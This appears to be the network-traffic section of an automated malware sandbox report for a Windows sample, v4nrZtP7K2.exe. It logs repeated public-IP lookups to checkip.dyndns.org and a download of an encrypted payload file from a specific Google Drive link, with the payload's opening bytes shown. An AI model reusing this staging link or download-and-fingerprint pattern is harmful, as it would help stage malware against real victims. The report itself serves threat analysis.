                                                                                    Jan 10, 2025 21:41:56.004151106 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:55 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.950021132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:56.902923107 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:57.748101950 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:57 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.950023132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:58.893111944 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:59.822940111 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:59 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.950025132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:00.720055103 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:02.217138052 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.950027132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:03.317325115 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:04.154455900 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:04 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.950029132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:05.354499102 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:06.380877018 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:06 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.950031132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:07.306477070 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:08.975754976 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:08 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 10, 2025 21:42:08.976102114 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:08 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 10, 2025 21:42:08.976408005 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:08 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.950033132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:10.014390945 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:10.871510983 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.950035132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:11.878213882 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 10, 2025 21:42:13.090872049 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.950037132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:13.984704018 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:14.813391924 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.950039132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:15.785559893 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:16.615860939 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.950041132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:17.658076048 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:19.500050068 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.950043132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:20.585624933 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:21.412628889 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    33192.168.2.950045132.226.8.16980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:42:25.239631891 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:42:26.085143089 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:42:25 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949709142.250.181.2384434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:02 UTC216OUTGET /uc?export=download&id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2025-01-10 20:41:04 UTC1920INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Fri, 10 Jan 2025 20:41:03 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Content-Security-Policy: script-src 'nonce-TkUX-2f7mgTjP7YxM2G14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.949710142.250.181.2254434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:04 UTC258OUTGET /download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:07 UTC4930INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: AFiumC4pyGtbGG_UuCWzNeQcBRl9FDlEH4PzB4JUrvb_yAOujtPYD3ua1NYvhJtqhurnaKK6
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="OQIGYmIk95.bin"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 94272
                                                                                    Last-Modified: Wed, 11 Dec 2024 23:12:38 GMT
                                                                                    Date: Fri, 10 Jan 2025 20:41:06 GMT
                                                                                    Expires: Fri, 10 Jan 2025 20:41:06 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=MTvnyQ==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
                                                                                    2025-01-10 20:41:07 UTC4930INData Raw: 4b 62 91 c4 3d a5 ac 30 45 b1 f6 1a 67 3b a0 a0 c1 d5 3f 0f 5f d9 b2 82 30 8f 18 c1 f9 80 3e f1 18 8e df f7 69 93 ec 26 1a 78 b6 b1 c5 f3 01 40 5d 5f 2e 70 1b 2a ce 0a dc 45 77 ce 67 b0 49 e4 45 1f 25 9b 3c 68 be 1d 9e 9d d9 bb 43 89 8c f8 e7 0f 50 01 c4 9b 6f 10 84 0a ce 09 65 62 5f d3 8c 8a 93 56 c9 8d 23 a5 35 04 0f 70 d5 c1 62 6a b0 85 84 b2 5c 5d d1 08 70 b7 b2 4d cd 11 a4 ce 41 66 39 a6 ef 26 10 aa 2a 3a 15 16 59 65 82 a2 5b 60 7c 73 9b 51 b3 a9 0c cb 61 f2 10 a7 e8 9d 3a eb 1f fd d2 fa d2 56 94 72 63 bc 9f a7 f9 71 f0 a3 34 43 f6 fe 4c 3b 83 25 50 2e ff 20 c8 c2 d5 24 c1 06 08 ba 19 0e 46 ce 78 d0 db 2d 9a 29 8c 77 31 9d 88 6a 2b 98 bd c3 f8 e0 a0 ff b8 17 5d d2 2d 7f a3 ab e2 9d 5f 41 f1 d8 ee 9d 29 46 fa c0 04 ee 77 c7 27 e3 69 69 b0 44 12 ea 03
                                                                                    Data Ascii: Kb=0Eg;?_0>i&x@]_.p*EwgIE%<hCPoeb_V#5pbj\]pMAf9&*:Ye[`|sQa:Vrcq4CL;%P. $Fx-)w1j+]-_A)Fw'iiD
